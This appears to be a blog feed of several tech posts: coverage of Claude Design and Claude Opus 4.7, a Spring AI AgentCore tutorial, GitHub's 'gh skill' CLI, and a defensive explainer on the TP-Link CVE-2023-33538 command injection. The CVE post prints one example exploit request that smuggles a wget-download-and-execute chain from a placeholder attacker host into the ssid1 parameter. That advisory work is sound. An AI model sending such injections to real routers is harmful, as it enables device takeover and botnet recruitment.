The brand system integration is the piece that makes this credible for actual teams rather than solo experiments. During onboarding, Claude reads your codebase and design files and assembles a design system — your colors, typography, components. Every project after that uses it automatically. Teams can maintain multiple systems and switch between them per project.

Input is flexible: start from a text prompt, upload images, DOCX, PPTX, or XLSX files, or point Claude at a codebase. There's also a web capture tool that grabs elements directly from your live site, so prototypes match the real product rather than approximating it.

Collaboration is organization-scoped. Designs can be kept private, shared view-only with anyone in the org via link, or opened for group editing where multiple teammates can chat with Claude together in the same canvas. Output formats include internal URLs, standalone HTML files, PDF, PPTX, and direct export to Canva.

The handoff to Claude Code is the closing piece of the loop. When a design is ready to build, Claude packages it into a handoff bundle that Claude Code can consume directly. The intent is to eliminate the translation layer between design and implementation entirely.

What Teams Are Actually Using It For

Anthropic lists six use cases, and they span a wider range of roles than you'd expect from a "design tool." Designers are using it for rapid prototyping and broad exploration. PMs are using it to sketch feature flows before handing off to engineering. Founders are turning rough outlines into pitch decks. Marketers are drafting landing pages and campaign visuals before looping in a designer to finish.

The early testimonials from teams are specific enough to be useful. Brilliant's senior product designer noted that their most complex pages — which previously required 20+ prompts in other tools — needed only 2 prompts in Claude Design. Datadog's PM described going from rough idea to working prototype before anyone leaves the room, with the output already matching their brand guidelines. Those aren't marketing abstractions; they're describing a workflow compression that most product teams would recognize as real.

Why This Is a Bigger Deal Than It Looks

The obvious read is that this is Anthropic entering the design tool market. The less obvious read is that Anthropic is extending the Claude Code workflow upward into the creative layer.

Claude Code already handles the bottom of the product development stack — reading codebases, writing and editing files, managing git workflows. Claude Design handles the top — ideation, visual prototyping, stakeholder-ready output. The handoff bundle between the two is not a nice-to-have; it's the architectural seam Anthropic is betting on. If that seam works reliably, the design-to-deployment loop stops requiring multiple tools, multiple handoffs, and multiple rounds of translation.

The Canva integration is also worth noting. Canva's CEO described the partnership as making it seamless to bring ideas from Claude Design into Canva for final polish and publishing. That positions Claude Design as the ideation and prototyping layer, with Canva as the finishing and distribution layer — rather than as direct competitors. It's a smart separation that gives Claude Design a clear lane without requiring it to replace every workflow Canva owns.

Availability and Access

Claude Design launched April 17, 2026, in research preview. It's available for Claude Pro, Max, Team, and Enterprise subscribers, included with your existing plan and counted against subscription limits. Extra usage can be enabled if you hit those limits.

Enterprise organizations get it off by default — admins enable it through Organization settings. Access is at claude.ai/design.

The research preview label matters. This is not a finished product. Anthropic says integrations with other tools are coming in the weeks ahead.

The gap between "person with an idea" and "polished thing that exists" has always been where time, money, and momentum go to die. Claude Design is a direct attempt to close it — and the Claude Code handoff suggests Anthropic is thinking about the full stack, not just the canvas.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Anthropic Just Gave Claude a Design Studio. Here's What Claude Design Actually Does.

Om Shree — Sat, 18 Apr 2026 04:44:41 +0000

Figma has been the unchallenged center of digital design for years. Yesterday, Anthropic quietly placed a bet that AI can change that.

On April 17, Anthropic launched Claude Design - a new product under its Anthropic Labs umbrella that lets you collaborate with Claude to build visual work: prototypes, slides, wireframes, landing pages, one-pagers, and more. It's powered by Claude Opus 4.7, their latest vision model, and it's rolling out in research preview for Pro, Max, Team, and Enterprise subscribers right now.

This isn't Claude generating pretty mockups you paste into Figma. This is a full design loop - ideation, iteration, export, and handoff - without ever leaving the chat.

The Problem It's Solving

Anthropic frames the core issue well: even experienced designers ration exploration. There's never enough time to prototype ten directions, so you pick two or three and commit. And for founders, PMs, and marketers who have a strong vision but no design background, turning ideas into shareable visuals has always required either hiring someone or learning tools that take months to master.

Claude Design is trying to solve both problems at once. Give designers room to explore widely. Give everyone else a way to produce visual work that doesn't look like a Canva template from 2019.

How the Workflow Actually Works

The flow is more structured than you'd expect from a chat-based tool.

Your brand gets built in first. During onboarding, Claude reads your codebase and design files to build a design system - your colors, typography, components. Every project after that inherits it automatically. No more pasting hex codes into every prompt.

You can start from anything. A text prompt, uploaded images, a DOCX, PPTX, or XLSX file, your codebase, or a live website via the web capture tool. If you want the prototype to look like your actual product, you point it at your site and Claude pulls the elements directly.

Iteration happens inline. You can comment on specific elements, edit text directly, or use custom adjustment knobs - built by Claude - to tweak spacing, color, and layout live. Then ask Claude to apply changes across the entire design at once.

Collaboration is organization-scoped. Keep designs private, share a view-only link inside your org, or grant edit access so teammates can jump into the same conversation with Claude together.

Export goes everywhere. Standalone HTML, PDF, PPTX, a shareable internal URL, or directly to Canva. The Canva integration is a first-class feature - designs land as fully editable Canva files, ready to refine and publish.

Handoff goes to Claude Code. When a design is ready to build, Claude bundles everything into a handoff package you pass to Claude Code with a single instruction. Design to implementation in one pipeline.

What Teams Are Actually Using It For

Anthropic lists six core use cases, and they're more specific than the usual "boost your productivity" marketing copy:

Realistic prototypes - Designers turn static mockups into interactive, shareable prototypes without touching code or going through PR review.
Product wireframes - PMs sketch feature flows and hand off directly to Claude Code for implementation, or to designers for refinement.
Design explorations - Quick generation of a wide range of visual directions to explore before committing.
Pitch decks and presentations - From rough outline to on-brand deck in minutes, exported as PPTX or sent to Canva.
Marketing collateral - Landing pages, social media assets, campaign visuals, ready for designer polish.
Frontier design - Code-powered prototypes with voice, video, shaders, 3D, and built-in AI.

That last one is the most interesting. "Frontier design" positions this beyond Figma's territory entirely - into interactive, AI-native artifacts that traditional design tools can't produce at all.

What Early Users Are Saying

Three companies shared early reactions, and the numbers are specific enough to be credible.

Brilliant, the interactive learning platform, noted that their most complex pages - which previously took 20+ prompts to recreate in other tools - required only 2 prompts in Claude Design. Their Senior Product Designer called the prototype-to-production handoff with Claude Code "seamless."

Datadog's product team reported going from rough idea to working prototype before anyone leaves the room. Work that previously took a week of back-and-forth between briefs, mockups, and review rounds now happens in a single conversation.

Canva co-founder and CEO Melanie Perkins framed the integration as a natural extension of their mission - bringing Canva to wherever ideas begin. When a design exits Claude Design into Canva, it becomes fully editable and collaborative immediately.

Why This Is a Bigger Deal Than It Looks

Most AI design tools have been wrappers - you describe something, get an image, manually replicate it in your actual design tool. Claude Design is different in structure. The brand system, the inline editing, the Claude Code handoff, the Canva export - these aren't convenience features. They're the infrastructure of a complete design workflow.

What Anthropic is building here is a design agent, not a design assistant. One that holds context about your brand, your product, your team's work, and the full history of a project. That's the same pattern we've seen with Claude Code in engineering - an AI that doesn't just answer questions but participates in the actual production pipeline.

The implications for teams without dedicated design resources are significant. A founder with a clear vision and access to Claude Pro can now go from napkin sketch to investor-ready prototype without a single design hire. A PM can produce a feature wireframe precise enough to hand off to engineering directly. A marketer can generate a campaign landing page in a conversation.

Availability and Access

Claude Design is available now in research preview for Pro, Max, Team, and Enterprise subscribers at claude.ai/design. Access is included in your existing plan and uses your subscription limits, with the option to enable extra usage if you go beyond them.

For Enterprise orgs, it's off by default - admins can enable it via Organization settings.

Anthropic says integrations with more tools are coming in the next few weeks.

Design just became part of the agentic stack. The question now is how fast the design community actually adopts it - and what Figma does next.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

CVE-2023-33538: The TP-Link Command Injection Flaw That's Still Being Actively Exploited

Om Shree — Fri, 17 Apr 2026 16:48:09 +0000

A vulnerability disclosed in 2023 is back in the news — because attackers are actively using it right now.

CVE-2023-33538 is a command injection bug with a CVSS score of 8.8 The Hacker News in several TP-Link home router models. CISA added it to its Known Exploited Vulnerabilities catalog in June 2025 CVE Details , and Unit 42 researchers confirmed active exploitation attempts shortly after. The situation is messier than most CVE alerts because the affected products are end-of-life, meaning no vendor patches are available CVE Details . The fix is to throw the router away.

What's Vulnerable

Three discontinued TP-Link router models are affected: TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2. CinchOps, Inc. These are mass-market home routers. Millions were sold. A lot of them are still plugged in.

How the Vulnerability Works

The /userRpm/WlanNetworkRpm endpoint contains a vulnerability in processing the ssid1 parameter sent through an HTTP GET request. The parameter value is not sanitized when the router processes it, so an attacker can send commands directly through it — allowing remote code execution on the device. Palo Alto Networks

The attack surface is the router's web management interface. The flaw requires no authentication to exploit in some configurations, meaning attackers can compromise vulnerable routers without needing login credentials or physical access. CinchOps, Inc. That said, Unit 42's deeper analysis found a wrinkle: successful exploitation actually requires authentication to the router's web interface paloaltonetworks — which in practice isn't much of a barrier, since most of these devices still run default credentials.

A typical exploit request looks like this:

GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNetwork;wget+http://attacker.com/payload+-O+/tmp/x;chmod+777+/tmp/x;/tmp/x HTTP/1.1
Host: 192.168.1.1

The ssid1 parameter accepts the injected commands. The router executes them without validation.

What Attackers Are Actually Doing

The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices. Palo Alto Networks The pattern is straightforward: find the router, authenticate with default credentials, inject a wget command to pull down a binary, make it executable, run it.

Unit 42's analysis uncovered something interesting though. The exploit attempts contain errors. While the endpoint /userRpm/WlanNetworkRpm.htm is correct, the exploits are incorrectly attempting to inject malicious commands into the ssid parameter. The actual vulnerable parameter on the target system is ssid1. Palo Alto Networks

So the attacks in the wild are technically flawed. They'd fail on a properly configured device. But that doesn't mean the underlying vulnerability isn't real — it is. It just means the botnet operators got the parameter name wrong, and the vulnerability is still wide open for anyone who looks at the original disclosure more carefully.

The Botnet Connection

In December 2024, Palo Alto Networks Unit 42 identified samples of an OT-centric malware called FrostyGoop. One of the IP addresses associated with an ENCO control device was also linked to a TP-Link WR740N router used to facilitate web browser access to the ENCO device. SecPod Blog Direct evidence tying CVE-2023-33538 to that specific attack doesn't exist, but the association illustrates the real-world risk: compromised home routers becoming pivot points into operational technology networks, including industrial systems.

Compromised routers can also be recruited into botnets to launch DDoS attacks, used to steal data transmitted through the network, or serve as a gateway to deploy malware on connected devices. SecPod Blog

Why This Is Still a Problem in 2025

The vulnerability was first disclosed in June 2023. TP-Link discontinued these router models in 2017. The combination of old hardware, no patch, and default credentials still in place on deployed devices is exactly the kind of long tail that keeps security researchers employed.

TP-Link told The Hacker News that it provided fixes through its tech support platform since 2018, and encouraged customers to contact support for patched firmware or to upgrade their devices. The Hacker News The practical reality: most people who bought a TP-Link router eight years ago are not checking in with TP-Link support for firmware updates. The router is just sitting there, doing its job, running software from a decade ago.

The EPSS score for this vulnerability sits at 90.63% probability of exploitation activity in the next 30 days CVE Details — that puts it in roughly the top percentile of all tracked CVEs for active exploitation risk.

What To Do

If you own or manage any of the affected models (TL-WR940N V2/V4, TL-WR841N V8/V10, TL-WR740N V1/V2), the recommendation is unambiguous: replace the device. There is no patch coming.

If replacement isn't immediate:

Disable remote management (usually under "Remote Management" or "Web Management" in router settings)
Change default admin credentials to something non-trivial
Segment the router from critical devices on your network
Monitor for unusual outbound traffic

For organizations doing network audits, these models will surface in legacy environments, branch offices, and home office setups for employees on VPN. They're worth explicitly checking for.

The Broader Pattern

CVE-2023-33538 is not an exotic vulnerability. It's a missing input sanitization check on a parameter that processes user input. The fix at the code level would have been a few lines. The real problem is that the devices were EOL before the vulnerability was even publicly documented, which means there's no vendor support left to deploy a fix.

This pattern keeps repeating. Old IoT hardware, no update mechanism, default credentials, perpetually connected. The Mirai botnet first appeared in 2016 exploiting default credentials on IoT devices. Eight years later, the same playbook still works on millions of deployed devices.

The vulnerability isn't the interesting part. The infrastructure that keeps these devices running for a decade after the vendor stopped caring is.

References:

Spring AI SDK for Amazon Bedrock AgentCore: Build Production-Ready Java AI Agents

Om Shree — Fri, 17 Apr 2026 02:51:56 +0000

Java developers have always had a rough deal with agentic AI. The proof of concepts are easy enough — wrap a model call, return a string. But taking that to production means custom controllers, SSE streaming handlers, health check endpoints, rate limiting, memory repositories... weeks of infrastructure work before you've written a single line of actual agent logic.

AWS just GA'd the Spring AI AgentCore SDK, and it collapses most of that into a single annotation.

What's Amazon Bedrock AgentCore

AgentCore is AWS's managed platform for running AI agents at scale. It handles the infrastructure layer — scaling, reliability, security, observability — and provides building blocks like short and long-term memory, browser automation, and sandboxed code execution.

The problem until now: integrating all of that into a Spring application required implementing the AgentCore Runtime contract yourself. Two specific endpoints (/invocations and /ping), SSE streaming with proper framing, health status signaling for long-running tasks, and all the Spring wiring on top. Not impossible, but tedious and error-prone.

The SDK handles all of it automatically.

The Core Idea: One Annotation

Here's a complete, AgentCore-compatible AI agent:

@Service
public class MyAgent {

    private final ChatClient chatClient;

    public MyAgent(ChatClient.Builder builder) {
        this.chatClient = builder.build();
    }

    @AgentCoreInvocation
    public String chat(PromptRequest request) {
        return chatClient.prompt()
            .user(request.prompt())
            .call()
            .content();
    }
}

record PromptRequest(String prompt) {}

The @AgentCoreInvocation annotation auto-configures the /invocations POST endpoint and the /ping health endpoint, handles JSON serialization, detects async tasks and reports busy status so AgentCore doesn't scale down mid-execution, and manages response formatting. No custom controllers.

Want streaming? Change the return type:

@AgentCoreInvocation
public Flux<String> streamingChat(PromptRequest request) {
    return chatClient.prompt()
        .user(request.prompt())
        .stream()
        .content();
}

The SDK switches to SSE output automatically and handles framing, backpressure, and connection lifecycle.

Adding Memory

The SDK integrates AgentCore Memory through Spring AI's advisor pattern — interceptors that enrich prompts with context before they hit the model.

Short-term memory uses a sliding window of recent messages. Long-term memory persists across sessions using four strategies: semantic (factual user info), user preference (explicit settings), summary (condensed history), and episodic (past interactions). AgentCore consolidates these asynchronously.

Configuration is minimal:

agentcore.memory.memory-id=${AGENTCORE_MEMORY_ID}
agentcore.memory.long-term.auto-discovery=true

Then compose it into your chat client:

@AgentCoreInvocation
public String chat(PromptRequest request, AgentCoreContext context) {
    String sessionId = context.getHeader(AgentCoreHeaders.SESSION_ID);

    return chatClient.prompt()
        .user(request.prompt())
        .advisors(agentCoreMemory.advisors)
        .advisors(a -> a.param(ChatMemory.CONVERSATION_ID, "user:" + sessionId))
        .call()
        .content();
}

Auto-discovery mode detects available LTM strategies without manual configuration.

Browser and Code Execution as Tools

AgentCore exposes two additional capabilities as Spring AI tool callbacks via ToolCallbackProvider:

Browser automation — agents can navigate websites, extract content, take screenshots, and interact with page elements.

Code interpreter — agents write and run Python, JavaScript, or TypeScript in a secure sandbox. The sandbox includes numpy, pandas, and matplotlib. Generated files go through an artifact store.

Both are added as Maven dependencies and wired in through the constructor:

public MyAgent(
    ChatClient.Builder builder,
    AgentCoreMemory agentCoreMemory,
    @Qualifier("browserToolCallbackProvider") ToolCallbackProvider browserTools,
    @Qualifier("codeInterpreterToolCallbackProvider") ToolCallbackProvider codeInterpreterTools) {

    this.chatClient = builder
        .defaultToolCallbacks(browserTools, codeInterpreterTools)
        .build();
}

The model decides which tool to call based on the user's request. Both tools are visible equally.

MCP Integration via AgentCore Gateway

Spring AI agents can connect to organizational tools through AgentCore Gateway, which provides MCP support with outbound authentication and a semantic tool registry. Configure your Spring AI MCP client to point at Gateway:

spring.ai.mcp.client.toolcallback.enabled=true
spring.ai.mcp.client.initialized=false
spring.ai.mcp.client.streamable-http.connections.gateway.url=${GATEWAY_URL}

Gateway handles credential management for downstream services. Agents discover and invoke enterprise tools without managing auth themselves.

Deployment Options

AgentCore Runtime — package as an ARM64 container, push to ECR, create a Runtime pointing at the image. AWS handles scaling, health monitoring, pay-per-use pricing (no charge for idle compute). Terraform examples are in the repo.

Standalone — use individual modules (Memory, Browser, Code Interpreter) in applications running on EKS, ECS, EC2, or on-premises. Teams can adopt incrementally — add memory to an existing Spring Boot service before considering a full migration to AgentCore Runtime.

Design Principles

The SDK is built around three ideas: convention over configuration (sensible defaults, port 8080, standard endpoint paths), annotation-driven development (one annotation replaces weeks of infrastructure code), and deployment flexibility (you're not locked into AgentCore Runtime to use the individual modules).

It's open source under Apache 2.0. The repo has five example applications ranging from a minimal agent to a full OAuth-authenticated setup with per-user memory isolation.

What's Coming

The team has flagged three upcoming additions: observability integration with CloudWatch, LangFuse, Datadog, and Dynatrace via OpenTelemetry; an evaluations framework for testing agent response quality; and advanced identity management for streamlined security context handling.

Getting Started

<dependency>
    <groupId>org.springaicommunity</groupId>
    <artifactId>spring-ai-agentcore-runtime-starter</artifactId>
</dependency>

Repo: github.com/spring-ai-community/spring-ai-agentcore

Docs: docs.aws.amazon.com/bedrock-agentcore

There's also a four-hour workshop that walks through building a travel and expense management agent from scratch — memory, browser, code execution, MCP integration, deployed serverless with auth. No ML experience required.

I cover AI infrastructure and developer tools at Shreesozo Yt Channel. AI Infra Weekly drops every Friday.

Everything You Need to Know About Claude Opus 4.7

Om Shree — Fri, 17 Apr 2026 02:41:18 +0000

Anthropic dropped Claude Opus 4.7 yesterday. It's a direct upgrade to Opus 4.6 — same price, same API shape, meaningfully better at the things that actually matter for production agentic work.

Here's what changed and what you actually need to know before migrating.

The Core Improvements

Coding and agentic tasks

This is where the biggest gains are. Opus 4.7 is noticeably better on hard, long-running coding problems — the kind where Opus 4.6 would stall, loop, or hand back something half-finished.

Cursor saw a 70% pass rate on their internal benchmark, up from 58% with Opus 4.6. CodeRabbit saw 10%+ recall improvement on difficult PRs. Notion's agent team reported 14% better task completion at fewer tokens and a third of the tool errors. Rakuten's SWE-Bench testing showed Opus 4.7 resolving 3x more production tasks.

What's actually different under the hood: the model is better at verifying its own outputs before reporting back. It catches its own logical faults during planning. It pushes through tool failures that used to stop the previous model cold. For agentic workflows, that consistency matters more than raw benchmark numbers.

Instruction following — with a catch

Opus 4.7 is substantially more literal about following instructions. That sounds straightforwardly good, and it mostly is. But there's a real migration implication: prompts written for earlier Claude models assumed some loose interpretation. Opus 4.7 takes instructions at face value. If your prompt says something ambiguous, you'll get a more literal result than you expected.

Worth auditing your existing prompts before switching over.

Vision: 3x the resolution

Opus 4.7 now accepts images up to 2,576 pixels on the long edge, roughly 3.75 megapixels. Previous Claude models topped out at about 1.15 megapixels. This is a model-level change — you don't need to change anything in your API calls. Images just get processed at higher fidelity automatically.

What this unlocks in practice: dense screenshots for computer-use agents, complex technical diagrams, chemical structures, any visual work where the detail actually matters. XBOW, which builds autonomous penetration testing tools, saw their visual acuity benchmark go from 54.5% with Opus 4.6 to 98.5%. That's not a marginal improvement — that's a different class of capability.

One note: higher resolution means more tokens consumed. If you don't need the extra fidelity, downsample before sending.

Memory across sessions

Opus 4.7 is better at using filesystem-based memory. It carries notes forward across long multi-session work and uses them to reduce the setup overhead on new tasks. For anyone running multi-day agentic workflows, this is genuinely useful.

New API Features Launching Alongside

xhigh effort level

There's a new effort tier between high and max. The full ladder is now: low → medium → high → xhigh → max. In Claude Code, Anthropic has raised the default to xhigh for all plans.

For coding and agentic use cases, Anthropic recommends starting with high or xhigh. Max effort is there for the hardest problems where you want to throw everything at it.

Task budgets (public beta)

Developers can now set token spend budgets on the API, giving Claude a way to allocate effort across longer runs rather than burning all its compute on early steps. Useful for agentic pipelines where you want the model to prioritize intelligently.

/ultrareview in Claude Code

A new slash command that produces a dedicated review session — reads through your changes and flags bugs and design issues a careful reviewer would catch. Pro and Max users get three free ultrareviews to try it out.

Auto mode extended to Max users

Auto mode lets Claude make tool-use decisions on your behalf, so you can run longer tasks with fewer interruptions. Previously limited, now available to Max plan users.

The Cybersecurity Angle

This one is worth understanding properly.

Last week Anthropic announced Project Glasswing, which assessed AI risks in cybersecurity. They stated they'd keep Claude Mythos Preview limited and test new cyber safeguards on less capable models first.

Opus 4.7 is the first model in that pipeline. Its cyber capabilities are intentionally less advanced than Mythos Preview — Anthropic experimented with selectively reducing these during training. And it ships with automatic safeguards that detect and block prohibited or high-risk cybersecurity requests.

If you do legitimate security work — vulnerability research, penetration testing, red-teaming — there's a new Cyber Verification Program you can apply to join. That gets you access to the capabilities that would otherwise be blocked.

Pricing and Availability

Same as Opus 4.6: $5 per million input tokens, $25 per million output tokens.

Available via Claude.ai, the API (claude-opus-4-7), Amazon Bedrock, Google Cloud Vertex AI, and Microsoft Foundry.

Migration Notes

Two things that affect token usage when moving from Opus 4.6:

First, Opus 4.7 uses an updated tokenizer. The same input can map to roughly 1.0–1.35x more tokens depending on content type. This varies — code and structured text tend toward the higher end.

Second, the model thinks more at higher effort levels, especially on later turns in agentic settings. More output tokens per complex task.

Anthropic's own testing shows the net effect is favorable on coding evaluations, but the right move is to measure it on your actual traffic before committing. They've published a migration guide at platform.claude.com/docs/en/about-claude/models/migration-guide.

Should You Upgrade

For straightforward API usage, yes. Same price, better results across coding, vision, and long-horizon tasks. The tokenizer change means costs may shift slightly but the model is more efficient in how it uses those tokens.

For production agentic pipelines, audit your prompts first. The stricter instruction following is a feature, but it will surface ambiguities in prompts that Opus 4.6 quietly papered over. Fix those before flipping the switch.

I cover Anthropic model releases and agentic AI infrastructure at our Yt channel. MCP Weekly drops every Monday.

`gh skill`: GitHub's New CLI Command Turns Agent Skills Into Installable Packages

Om Shree — Thu, 16 Apr 2026 22:31:59 +0000

I've been using SKILL.md files in my local Claude Code setup for months. Custom instructions for different tasks, each living in its own folder, each teaching the agent how to behave for a specific workflow. Works well. The annoying part has always been distribution — if I want to reuse a skill on another machine, I'm copying files manually like it's 2012.

GitHub apparently had the same frustration. Last week they shipped gh skill, a new GitHub CLI command that does for agent skills what npm did for packages.

What Even Are Agent Skills

Skills are SKILL.md files — folders of instructions, scripts, and resources that tell an AI agent how to handle a specific task. Write a documentation page. Run a specific test pattern. Format output a certain way.

They follow the open Agent Skills spec at agentskills.io and work across GitHub Copilot, Claude Code, Cursor, Codex, and Gemini CLI. The skill doesn't know or care which agent loads it.

What Shipped

Requires GitHub CLI v2.90.0 or later.

Install a skill:

gh skill install github/awesome-copilot documentation-writer

Target a specific agent and scope:

gh skill install github/awesome-copilot documentation-writer --agent claude-code --scope user

Skills go to the correct directory for your agent host automatically. No manual path work.

Pin to a version:

gh skill install github/awesome-copilot documentation-writer --pin v1.2.0

# Or pin to a commit for full reproducibility
gh skill install github/awesome-copilot documentation-writer --pin abc123def

Pinned skills get skipped during gh skill update --all, so upgrades are deliberate.

Check for updates:

gh skill update           # interactive
gh skill update --all     # everything at once

Validate and publish your own:

gh skill publish          # validate against agentskills.io spec
gh skill publish --fix    # auto-fix metadata issues

The Supply Chain Part

This is less flashy but it's the part that actually matters.

Agent skills are instructions. Instructions that shape what an AI agent does inside your codebase. A silently modified skill is a real attack surface — same as a tampered npm package, just newer.

gh skill handles this with a few concrete mechanisms:

When you install a skill, it writes provenance metadata directly into the SKILL.md frontmatter — source repo, ref, and git tree SHA. On every gh skill update call, local SHAs get compared against remote. It detects actual content changes, not just version bumps.

Publishers can enable immutable releases, meaning release content can't be altered after publication — even by repo admins. If you pin to a tag from an immutable release, you're fully protected even if the repo gets compromised later.

The provenance data lives inside the skill file itself, so it travels with the skill when it gets moved, copied, or reorganized.

Why This Is a Bigger Deal Than It Looks

The SKILL.md pattern has been spreading quietly for months. Anthropic has a reference skills repo. GitHub's awesome-copilot has a growing community collection. VS Code ships skill support. Claude Code loads them automatically.

What was missing was tooling. Right now, sharing a skill means sending a file. Updating a skill means remembering where you put it. There's no dependency graph, no version history, no integrity check.

gh skill is the package manager layer the ecosystem needed. It's early — the spec is still young, the community repo is still small — but the primitives are solid. Git tags for versioning. SHAs for integrity. Frontmatter for portable provenance.

If you maintain skills for your team or your own agent setup, the publish workflow is worth looking at now, before the ecosystem gets crowded.

gh extension upgrade --all   # make sure you're on v2.90.0+
gh skill install github/awesome-copilot documentation-writer

Building content around MCP and agentic AI? I write about this stuff weekly Here !!!